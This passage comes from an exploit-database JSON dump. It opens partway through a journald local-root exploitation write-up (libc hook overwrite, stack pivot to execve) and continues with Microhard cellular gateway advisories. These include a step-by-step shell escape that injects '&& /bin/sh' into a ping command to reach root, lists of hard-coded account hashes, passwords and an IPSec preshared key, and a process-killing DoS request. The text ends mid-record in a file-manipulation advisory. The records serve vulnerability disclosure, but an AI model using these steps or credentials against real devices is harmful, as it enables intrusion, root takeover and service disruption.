obtaining a jumpable stack-to-libc distance\r\n (and hence a root shell) after 2048 tries * 2 seconds ~= 68 minutes\r\n (by default, if journald crashes less than 5 times within 10 seconds,\r\n it is restarted automatically by systemd).\r\n\r\n- For the \"write-where\" part of our \"write-what-where\", we overwrite\r\n libc's __free_hook function pointer, whose address modulo 16 is always\r\n equal to 8 (on every amd64 distribution that we exploited).\r\n\r\n- For the \"write-what\" part of our \"write-what-where\", we overwrite\r\n __free_hook with the address of libc's system() function: whenever\r\n journald free()s data that we control, we achieve arbitrary command\r\n execution.\r\n\r\nLast-minute note: on CentOS 7, the usual function pointers in libc's\r\nread-write segment (__free_hook, __malloc_hook, etc) are not located at\r\nmultiples of 16 plus 8. To circumvent this problem:\r\n\r\n- First, we overwrite the \"_chain\" pointer of stderr's FILE structure\r\n with the address of our own fake FILE structure (this \"_chain\" pointer\r\n is located at a multiple of 16 plus 8, in libc's read-write segment).\r\n\r\n- Next, we corrupt one of malloc's internal variables (also in libc's\r\n read-write segment).\r\n\r\n- Last, we force a call to malloc() or free(), which detects the\r\n corruption of its internal variable and calls abort(), which calls\r\n _IO_flush_all_lockp(), which follows stderr's overwritten \"_chain\"\r\n pointer to our fake FILE structure; we eventually achieve arbitrary\r\n command execution by calling libc's system() via one of the function\r\n pointers in our fake FILE structure.\r\n\r\n------------------------------------------------------------------------\r\ni386 Exploitation\r\n------------------------------------------------------------------------\r\n\r\nOur i386 exploit is very similar to the amd64 exploit, but:\r\n\r\n- The stack-to-libc distance is always jumpable (it is roughly 128MB).\r\n\r\n- There is no hole between ld.so's read-execute and read-only segments.\r\n However, libc's address is randomized in a narrow range of 1MB and is\r\n therefore brute forcible: we have a good chance of correctly guessing\r\n libc's address after 1MB / 4KB = 256 tries * 2 seconds ~= 8 minutes.\r\n\r\n- For the \"write-where\" part of our \"write-what-where\", we overwrite\r\n libc's __malloc_hook function pointer (__free_hook was never located\r\n at a multiple of 16 plus 8 or 12 on the i386 distributions that we\r\n exploited, but __malloc_hook always is).\r\n\r\n- For the \"write-what\" part of our \"write-what-where\", we overwrite\r\n __malloc_hook with the address of a \"mov esp, 0x89fffa5d ; ret\" gadget\r\n (or equivalent stack pivot): since our native message can be as large\r\n as 768MB, we can mmap() it at 0x89fffa5d, take control of the stack,\r\n and return into libc's execve().\n\n# 0day.today [2019-01-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31916"}, {"lastseen": "2018-07-18T04:05:27", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category local exploits", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "1337DAY-ID-30735", "href": "https://0day.today/exploit/description/30735", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Restricted Shell Escape Vulnerability", "type": "zdt", "sourceData": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Backdoor Jailbreak\r\n \r\n \r\nVendor: Microhard Systems Inc.\r\nProduct web page: http://www.microhardcorp.com\r\nAffected version: IPn4G 1.1.0 build 1098\r\n IPn3Gb 2.2.0 build 2160\r\n IPn4Gb 1.1.6 build 1184-14\r\n IPn4Gb 1.1.0 Rev 2 build 1090-2\r\n IPn4Gb 1.1.0 Rev 2 build 1086\r\n Bullet-3G 1.2.0 Rev A build 1032\r\n VIP4Gb 1.1.6 build 1204\r\n VIP4G 1.1.6 Rev 3.0 build 1184-14\r\n VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196\r\n IPn3Gii / Bullet-3G 1.2.0 build 1076\r\n IPn4Gii / Bullet-LTE 1.2.0 build 1078\r\n BulletPlus 1.3.0 build 1036\r\n Dragon-LTE 1.1.0 build 1036\r\n \r\nSummary: The new IPn4Gb provides a rugged, industrial strength wireless solution\r\nusing the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb\r\nfeatures integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control\r\nLists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial\r\nRS232/485/422 devices!\r\n \r\nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses\r\nthe widespread deployment of cellular network infrastructure for critical data collection.\r\nFrom remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!\r\nThe IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It\r\nprovides robust and secure wireless communication of Serial, USB and Ethernet data.\r\n \r\nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength\r\nwireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things\r\nto the next level by providing features such as Ethernet with PoE, RS232 Serial port\r\nand 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated\r\nFirewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution\r\nworth looking at!\r\n \r\nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength\r\nwireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote\r\ncellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight\r\nsystem integration and design flexibility with dual Ethernet Ports and high power\r\n802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access\r\nControl Lists, the Dragon-LTE provides a solution for any cellular application!\r\n \r\nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE\r\nnetwork infrastructure for critical data communications. The VIP4Gb provides simultaneous\r\nnetwork connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital\r\nI/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in\r\nany application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.\r\nIt provides robust and secure wireless communication of Serial, Ethernet & WiFi data.\r\n \r\nDesc: The web shell application includes a service called Microhard Sh that is documented\r\nonly as 'reserved for internal use'. This service can be enabled by an authenticated\r\nuser within the Services menu in the web admin panel. This can also be enabled via CSRF\r\nattack. When the service is enabled, a user 'msshc' is created on the system with password\r\n'msshc' for SSH shell access on port 22. When connected, the user is dropped into a NcFTP\r\njailed environment, that has limited commands for file transfer administration. One of the\r\ncommands is a custom added 'ping' command that has a command injection vulnerability that\r\nallows the attacker to escape the restricted environment and enter into a root shell terminal\r\nthat can execute commands as the root user. \r\n \r\nTested on: httpd-ssl-1.0.0\r\n Linux 2.6.32.9 ([email\u00a0protected]) (gcc version 4.4.3)\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2018-5486\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5486.php\r\n \r\n \r\n13.03.2018\r\n \r\n--\r\n \r\n \r\n1) Enable Microhard Sh service:\r\n-------------------------------\r\n \r\nhttp://192.168.1.1/cgi-bin/webif/system-services.sh?service=msshc&action=start - Start the Microhard Sh (msshc) service\r\nhttp://192.168.1.1/cgi-bin/webif/system-services.sh?service=msshc&action=enable - Auto-enable (auto-start)\r\n \r\n \r\n2) Check what happens when enabling Microhard Sh service:\r\n---------------------------------------------------------\r\n \r\n# cat /etc/init.d/msshc\r\n#!/bin/sh /etc/rc.common\r\n# Copyright (C) 2013 Microhardcorp\r\n \r\nstart() {\r\n deluser msshc\r\n rm -rf /tmp/msshc\r\n mkdir -p /tmp/msshc\r\n msshcshell=$(cat /etc/shells | grep -c \"/etc/msshc.sh\")\r\n [ $msshcshell -gt 0 ] || echo \"/etc/msshc.sh\" >> /etc/shells\r\n passwd=$(/sbin/uci get msshc.general.passwd)\r\n echo \"$passwd\" >> /etc/passwd\r\n}\r\n \r\nstop() {\r\n deluser msshc\r\n rm -rf /tmp/msshc\r\n}\r\n \r\n \r\n3) Check the /etc/msshc.sh script:\r\n----------------------------------\r\n \r\n# cat /etc/msshc.sh\r\n#!/bin/sh \r\n# Copyright (C) 2013 Microhardcorp\r\n \r\n/usr/bin/ncftp\r\n \r\nexit 0\r\n \r\n \r\n4) Check the /sbin/uci binary:\r\n------------------------------\r\n \r\nUsage: /sbin/uci [<options>] <command> [<arguments>]\r\n \r\nCommands:\r\n batch\r\n export [<config>]\r\n import [<config>]\r\n changes [<config>]\r\n commit [<config>]\r\n add <config> <section-type>\r\n add_list <config>.<section>.<option>=<string>\r\n show [<config>[.<section>[.<option>]]]\r\n get <config>.<section>[.<option>]\r\n set <config>.<section>[.<option>]=<value>\r\n delete <config>[.<section[.<option>]]\r\n rename <config>.<section>[.<option>]=<name>\r\n revert <config>[.<section>[.<option>]]\r\n \r\nOptions:\r\n -c <path> set the search path for config files (default: /etc/config)\r\n -d <str> set the delimiter for list values in uci show\r\n -f <file> use <file> as input instead of stdin\r\n -L do not load any plugins\r\n -m when importing, merge data into an existing package\r\n -n name unnamed sections on export (default)\r\n -N don't name unnamed sections\r\n -p <path> add a search path for config change files\r\n -P <path> add a search path for config change files and use as default\r\n -q quiet mode (don't print error messages)\r\n -s force strict mode (stop on parser errors, default)\r\n -S disable strict mode\r\n -X do not use extended syntax on 'show'\r\n \r\n# /sbin/uci get msshc.general.passwd\r\nmsshc:$1$bM7uisGu$iMRC.LVlXjKAv7Y07t1fm/:0:0:root:/tmp/msshc:/etc/msshc.sh\r\n \r\n \r\n5) Check the NcFTP binary:\r\n--------------------------\r\n \r\n# /usr/bin/ncftp -h\r\n \r\nUsage: ncftp [flags] [<host> | <directory URL to browse>]\r\n \r\nFlags:\r\n -u XX Use username XX instead of anonymous.\r\n -p XX Use password XX with the username.\r\n -P XX Use port number XX instead of the default FTP service port (21).\r\n -j XX Use account XX with the username (rarely needed).\r\n -F Dump a sample $HOME/.ncftp/firewall prefs file to stdout and exit.\r\n \r\nProgram version: NcFTP 3.2.5/474 Feb 02 2011, 05:13 PM\r\nLibrary version: LibNcFTP 3.2.5 (January 17, 2011)\r\nBuild system: Linux DProBuilder 2.6.34.9-69.fc13.i686.PAE #1 SMP Tue Ma...\r\n \r\nThis is a freeware program by Mike Gleason (http://www.NcFTP.com).\r\nA directory URL ends in a slash, i.e. ftp://ftp.freebsd.org/pub/FreeBSD/\r\nUse ncftpget and ncftpput for command-line FTP and file URLs.\r\n \r\n \r\n6) Go to jail:\r\n--------------\r\n \r\n[email\u00a0protected]:~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email\u00a0protected]\r\nThe authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.\r\nRSA key fingerprint is SHA256:x9GG/Dlkg88058ilA2xyhYqllYRgZOTPu6reGS8K1Yg.\r\nAre you sure you want to continue connecting (yes/no)? yes\r\nWarning: Permanently added '192.168.1.1' (RSA) to the list of known hosts.\r\n[email\u00a0protected]'s password: \r\nNcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).\r\n \r\nCopyright (c) 1992-2011 by Mike Gleason.\r\nAll rights reserved.\r\n \r\nncftp> ?\r\nCommands may be abbreviated. 'help showall' shows hidden and unsupported \r\ncommands. 'help <command>' gives a brief description of <command>.\r\n \r\nascii close help mkdir put rename set umask \r\nbinary debug lls open pwd rhelp show \r\ncd dir lrm passive quit rm site \r\nchmod get ls ping quote rmdir type \r\n \r\nFor details, please see the manual (\"man ncftp\" at your regular shell prompt\r\nor online at http://www.NcFTP.com/ncftp/doc/ncftp.html).\r\nncftp> help showall\r\nCommands may be abbreviated. 'help showall' shows hidden and unsupported\r\ncommands. 'help <command>' gives a brief description of <command>.\r\n \r\n? chmod exit ls mv pwd rhelp site\r\nascii close get mget open quit rm type\r\nbinary debug help mkdir passive quote rmdir umask\r\nbye delete lls mls ping rename set\r\ncd dir lrm mput put rglob show\r\n \r\nFor details, please see the manual (\"man ncftp\" at your regular shell prompt\r\nor online at http://www.NcFTP.com/ncftp/doc/ncftp.html).\r\nncftp> ls\r\nls: must be connected to do that.\r\nncftp> man ncftp\r\nman: no such command.\r\nncftp> pwd\r\npwd: must be connected to do that.\r\nncftp> show\r\nanon-password [email\u00a0protected]\r\nauto-ascii |.txt|.asc|.html|.htm|.css|.xml|.ini|.pl|.hqx|.cfg|.c|.h|.cpp|.hpp|.bat|.m3u|.pls|\r\nauto-resume no\r\nautosave-bookmark-changes no\r\nconfirm-close no\r\nconnect-timeout 20\r\ncontrol-timeout 135\r\nlogsize 10240\r\npager more\r\npassive optional\r\nprogress-meter 2 (statbar)\r\nredial-delay 20\r\nsave-passwords ask\r\nshow-status-in-xterm-titlebar no\r\nso-bufsize 0 (use system default)\r\nxfer-timeout 3600\r\nyes-i-know-about-NcFTPd no\r\nncftp>\r\n \r\n \r\n7) The Shawshank Redemption:\r\n---------------------------- \r\n \r\nncftp> ping -c1 -4 0.0.0.0 `id` \r\nBusyBox v1.15.3 (2016-06-20 14:58:14 MDT) multi-call binary\r\n \r\nUsage: ping [OPTIONS] HOST\r\n \r\nSend ICMP ECHO_REQUEST packets to network hosts\r\n \r\nOptions:\r\n -4, -6 Force IPv4 or IPv6 hostname resolution\r\n -c CNT Send only CNT pings\r\n -s SIZE Send SIZE data bytes in packets (default:56)\r\n -I IFACE/IP Use interface or IP address as source\r\n -W SEC Seconds to wait for the first response (default:10)\r\n (after all -c CNT packets are sent)\r\n -w SEC Seconds until ping exits (default:infinite)\r\n (can exit earlier with -c CNT)\r\n -q Quiet, only displays output at start\r\n and when finished\r\n \r\nncftp>\r\n \r\n \r\n8) Come on Andy:\r\n----------------\r\n \r\nncftp> ping -c1 -4 0.0.0.0 && /bin/sh\r\nPING 0.0.0.0 (0.0.0.0): 56 data bytes\r\n64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.423 ms\r\n \r\n--- 0.0.0.0 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\r\nround-trip min/avg/max = 0.423/0.423/0.423 ms\r\n \r\n \r\nBusyBox v1.15.3 (2016-06-20 14:58:14 MDT) built-in shell (ash)\r\nEnter 'help' for a list of built-in commands.\r\n \r\n/tmp/msshc # id ; uname -r\r\nuid=0(root) gid=0(root)\r\n2.6.32.9\r\n/tmp/msshc #\n\n# 0day.today [2018-07-18] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30735"}, {"lastseen": "2018-07-17T20:05:53", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category remote exploits", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "1337DAY-ID-30734", "href": "https://0day.today/exploit/description/30734", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Default Credentials Vulnerability", "type": "zdt", "sourceData": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Default Credentials\r\n \r\n \r\nVendor: Microhard Systems Inc.\r\nProduct web page: http://www.microhardcorp.com\r\nAffected version: IPn4G 1.1.0 build 1098\r\n IPn3Gb 2.2.0 build 2160\r\n IPn4Gb 1.1.6 build 1184-14\r\n IPn4Gb 1.1.0 Rev 2 build 1090-2\r\n IPn4Gb 1.1.0 Rev 2 build 1086\r\n Bullet-3G 1.2.0 Rev A build 1032\r\n VIP4Gb 1.1.6 build 1204\r\n VIP4G 1.1.6 Rev 3.0 build 1184-14\r\n VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196\r\n IPn3Gii / Bullet-3G 1.2.0 build 1076\r\n IPn4Gii / Bullet-LTE 1.2.0 build 1078\r\n BulletPlus 1.3.0 build 1036\r\n Dragon-LTE 1.1.0 build 1036\r\n \r\nSummary: The new IPn4Gb provides a rugged, industrial strength wireless solution\r\nusing the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb\r\nfeatures integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control\r\nLists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial\r\nRS232/485/422 devices!\r\n \r\nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses\r\nthe widespread deployment of cellular network infrastructure for critical data collection.\r\nFrom remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!\r\nThe IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It\r\nprovides robust and secure wireless communication of Serial, USB and Ethernet data.\r\n \r\nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength\r\nwireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things\r\nto the next level by providing features such as Ethernet with PoE, RS232 Serial port\r\nand 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated\r\nFirewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution\r\nworth looking at!\r\n \r\nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength\r\nwireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote\r\ncellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight\r\nsystem integration and design flexibility with dual Ethernet Ports and high power\r\n802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access\r\nControl Lists, the Dragon-LTE provides a solution for any cellular application!\r\n \r\nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE\r\nnetwork infrastructure for critical data communications. The VIP4Gb provides simultaneous\r\nnetwork connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital\r\nI/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in\r\nany application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.\r\nIt provides robust and secure wireless communication of Serial, Ethernet & WiFi data.\r\n \r\nDesc: The devices utilizes hard-coded credentials within its Linux distribution image.\r\nThese sets of credentials are never exposed to the end-user and cannot be changed through\r\nany normal operation of the gateway. Another vulnerability could allow an authenticated\r\nattacker to gain root access. The vulnerability is due to default credentials. An attacker\r\ncould exploit this vulnerability by logging in using the default credentials.\r\n \r\nTested on: httpd-ssl-1.0.0\r\n Linux 2.6.32.9 ([email\u00a0protected]) (gcc version 4.4.3)\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2018-5480\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5480.php\r\n \r\n \r\n13.03.2018\r\n \r\n--\r\n \r\n \r\nSystem/Web/FTP:\r\n---------------\r\nroot:$1$fwjr710d$lOBXhRTmQk/rLLJY5sitO/:0:0:root:/:/bin/ash\r\nadmin:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1:0:0:admin:/:/etc/m_cli/m_cli.sh\r\nupgrade:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1:500:500:ftpupgrade:/upgrade/upgrade:/bin/false\r\nat:$1$rKAtMKeY$RSLlzCp8LzEENRaBk615o/:0:0:admin:/:/bin/atUI\r\nnobody:*:65534:65534:nobody:/var:/bin/false\r\ntestlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.:0:0:Linux User,,,:/:/etc/testlab.sh\r\ntestlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0:0:0:Linux User,,,:/:/etc/m_cli/m_cli.sh\r\nmsshc:$1$bM7uisGu$iMRC.LVlXjKAv7Y07t1fm/:0:0:root:/tmp/msshc:/etc/msshc.sh\r\n \r\nupgrade:admin\r\ntestlab:testlab\r\ntestlab1:testlab1\r\nadmin:admin\r\nmsshc:msshc\r\n \r\nBCLC config defaults:\r\n---------------------\r\nIPSec preshared key: DerekUsedThisSecureKeyToEncryptClientAccessIn2014\r\nAccess control user/pass: admin:[email\u00a0protected]\r\nNMS System setting pass: NotComplicated\r\nWebclient setting user/pass: webclient:AlsoNotComplicated\r\nSystem access control user/pass: readonly:ItIsAlmostFriday\n\n# 0day.today [2018-07-17] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30734"}, {"lastseen": "2018-07-18T02:01:37", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category dos / poc", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "1337DAY-ID-30737", "href": "https://0day.today/exploit/description/30737", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Denial of Service Vulnerability", "type": "zdt", "sourceData": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Service Control DoS\r\n \r\n \r\nVendor: Microhard Systems Inc.\r\nProduct web page: http://www.microhardcorp.com\r\nAffected version: IPn4G 1.1.0 build 1098\r\n IPn3Gb 2.2.0 build 2160\r\n IPn4Gb 1.1.6 build 1184-14\r\n IPn4Gb 1.1.0 Rev 2 build 1090-2\r\n IPn4Gb 1.1.0 Rev 2 build 1086\r\n Bullet-3G 1.2.0 Rev A build 1032\r\n VIP4Gb 1.1.6 build 1204\r\n VIP4G 1.1.6 Rev 3.0 build 1184-14\r\n VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196\r\n IPn3Gii / Bullet-3G 1.2.0 build 1076\r\n IPn4Gii / Bullet-LTE 1.2.0 build 1078\r\n BulletPlus 1.3.0 build 1036\r\n Dragon-LTE 1.1.0 build 1036\r\n \r\nSummary: The new IPn4Gb provides a rugged, industrial strength wireless solution\r\nusing the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb\r\nfeatures integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control\r\nLists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial\r\nRS232/485/422 devices!\r\n \r\nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses\r\nthe widespread deployment of cellular network infrastructure for critical data collection.\r\nFrom remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!\r\nThe IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It\r\nprovides robust and secure wireless communication of Serial, USB and Ethernet data.\r\n \r\nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength\r\nwireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things\r\nto the next level by providing features such as Ethernet with PoE, RS232 Serial port\r\nand 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated\r\nFirewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution\r\nworth looking at!\r\n \r\nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength\r\nwireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote\r\ncellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight\r\nsystem integration and design flexibility with dual Ethernet Ports and high power\r\n802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access\r\nControl Lists, the Dragon-LTE provides a solution for any cellular application!\r\n \r\nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE\r\nnetwork infrastructure for critical data communications. The VIP4Gb provides simultaneous\r\nnetwork connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital\r\nI/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in\r\nany application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.\r\nIt provides robust and secure wireless communication of Serial, Ethernet & WiFi data.\r\n \r\nDesc: There is an undocumented and hidden feature that allows an authenticated attacker\r\nto list running processes in the operating system and send arbitrary signals to kill\r\nany process running in the background including starting and stopping system services.\r\nThis impacts availability and can be triggered also by CSRF attacks that requires device\r\nrestart and/or factory reset to rollback malicious changes.\r\n \r\nTested on: httpd-ssl-1.0.0\r\n Linux 2.6.32.9 ([email\u00a0protected]) (gcc version 4.4.3)\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2018-5481\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5481.php\r\n \r\n \r\n13.03.2018\r\n \r\n--\r\n \r\n \r\nPOST /cgi-bin/webif/status-processes.sh HTTP/1.1\r\nHost: 192.168.1.1\r\nConnection: keep-alive\r\nContent-Length: 34\r\nCache-Control: max-age=0\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nOrigin: http://166.130.177.150\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nReferer: http://192.168.1.1/cgi-bin/webif/status-processes.sh\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCookie: style=null\r\n \r\nsignal=SIGILL&pid=1337&kill=+Send+\r\n \r\n \r\n===\r\n \r\n \r\nAvailable services:\r\n \r\n# ls /etc/init.d/\r\nboot dmesgbackup gpsgatetr ipsecfwadd mh_product quagga sysctl vlan\r\nchecksync dnsmasq gpsr keepalive modbusd rcS systemmode vnstat\r\ncoova-chilli done gpsrecorderd led msmscomd salertd telnet watchdog\r\ncron dropbear gred ledcon msshc sdpServer timezone webif\r\ncrontab eurd httpd localmonitord network snmpd twatchdog webiffirewalllog\r\ncustom-user-startup firewall ioports logtrigger ntpclient soip umount websockserverd\r\ndatausemonitord force_reboot iperf lte ntrd soip2 updatedd wsClient\r\ndefconfig ftpd ipsec lteshutdown nxl2tpd-wan soip2.getty usb xl2tpd\r\ndhcp_client gpsd ipsec_vpn media_ctrl pimd soipd1 vcad xl2tpd-wan\r\n \r\n \r\nStop the HTTPd:\r\n \r\nGET http://192.168.1.1/cgi-bin/webif/system-services.sh?service=httpd&action=stop HTTP/1.1\n\n# 0day.today [2018-07-18] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30737"}, {"lastseen": "2018-07-17T20:05:36", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "1337DAY-ID-30739", "href": "https://0day.today/exploit/description/30739", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - File Manipulation Vulnerability", "type": "zdt", "sourceData": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Arbitrary File Attacks\r\n \r\n \r\nVendor: Microhard Systems Inc.\r\nProduct web page: http://www.microhardcorp.com\r\nAffected version: IPn4G 1.1.0 build 1098\r\n IPn3Gb 2.2.0 build 2160\r\n IPn4Gb 1.1.6 build 1184-14\r\n IPn4Gb 1.1.0 Rev 2 build 1090-2\r\n IPn4Gb 1.1.0 Rev 2 build 1086\r\n Bullet-3G 1.2.0 Rev A build 1032\r\n VIP4Gb 1.1.6 build 1204\r\n VIP4G 1.1.6 Rev 3.0 build 1184-14\r\n VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196\r\n IPn3Gii / Bullet-3G 1.2.0 build 1076\r\n IPn4Gii / Bullet-LTE 1.2.0 build 1078\r\n BulletPlus 1.3.0 build 1036\r\n Dragon-LTE 1.1.0 build 1036\r\n \r\nSummary: The new IPn4Gb provides a rugged, industrial strength wireless solution\r\nusing the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb\r\nfeatures integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control\r\nLists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial\r\nRS232/485/422 devices!\r\n \r\nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses\r\nthe widespread deployment of cellular network infrastructure for critical data collection.\r\nFrom remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!\r\nThe IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It\r\nprovides robust and secure wireless communication of Serial, USB and Ethernet data.\r\n \r\nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength\r\nwireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things\r\nto the next level by providing features such as Ethernet with PoE, RS232 Serial port\r\nand 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated\r\nFirewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution\r\nworth looking at!\r\n \r\nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength\r\nwireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote\r\ncellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight\r\nsystem integration and design flexibility with dual Ethernet Ports and high power\r\n802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access\r\nControl Lists, the Dragon-LTE provides a solution for any cellular application!\r\n \r\nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE\r\nnetwork infrastructure for critical data communications. The VIP4Gb provides simultaneous\r\nnetwork connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital\r\nI/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in\r\nany application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.\r\nIt provides robust and secure wireless communication of Serial, Ethernet & WiFi data.\r\n \r\nDesc: Due to the hidden and undocumented File Editor (Filesystem Browser) shell script\r\n'system-editor.sh' an attacker can leverage this issue to read, modify or delete arbitrary\r\nfiles on the system. Input passed thru the 'path' and 'savefile', 'edit' and 'delfile' GET\r\nand POST parameters is not properly sanitized before being used to modify files. This can\r\nbe exploited by an authenticated attacker to read or modify arbitrary files on the affected\r\nsystem.\r\n \r\nTested on: httpd-ssl-1.0.0\r\n Linux 2.6.32.9 ([email\u00a0protected]) (gcc version 4.4.3)\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2018-5485\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5485.php\r\n \r\n \r\n13.03.2018\r\n \r\n--\r\n \r\n 